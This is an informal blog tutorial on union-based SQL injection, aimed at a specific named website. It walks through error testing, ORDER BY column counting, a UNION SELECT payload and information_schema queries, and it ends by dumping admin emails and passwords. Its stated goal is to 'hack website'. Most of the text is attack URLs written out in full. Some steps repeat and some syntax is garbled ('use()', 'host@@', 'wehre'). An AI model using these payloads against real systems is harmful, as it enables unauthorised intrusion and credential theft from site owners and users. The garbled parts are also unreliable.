Hello PrOleEtS once again T00L kiT here, today i gonna start Sqli Injection, today is First class so lets start
Requirements :-
Firefox Browser
Ok i have already Vulnerability site like this
http://www.morephotosradio.com/transcript.php?interview_id=2021
Check this this website vulnerability yes or no, Put ' in the end of Url Like
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'
yes i got a sql error you can see this
Step 2
=> Find tables numbers using order by--+- query For example
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+- (No Error)
and so on when we got Error this mean its table number like
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+- ( Error)
its mean its have 46 table numbers
Step 3
=> Go to union based => Union statement and Select INT,INT
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+- (No Error)
and so on when we got Error this mean its table number like
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+- ( Error)
its mean its have 46 table numbers
Step 3
=> Go to union based => Union statement and Select INT,INT
Step 4
=> Now enter table number value and click ok
Step 5
=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working
Its working we can't got any error :D
step 6
=> Put - in the end link values like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-
you can see this when we put - we go got Columns number is 6
Step 7
=> Now we need version :-
replace 6 number this query "version()"
you can see this we got sqli Version if you want more information like user name hostname and database use this query :-
For Version = version()
For Database = database()
For use = use()
For Host = host@@
Step 8
=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like
For Tables
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-
you can see this we got all table names , we need admin user name because we wanna hack website :D
Step 9
=> now replace "database()" with User
Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like
And replace table with columns like this
For columns
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
now click Execute
Step 10
Now we need admin Email id and password now use this query
replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name
For data
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-
You can see this we got all admin emails and passwords ;) :D
i hope you like this Tutorial
Thanks for visiting
0 comments:
Post a Comment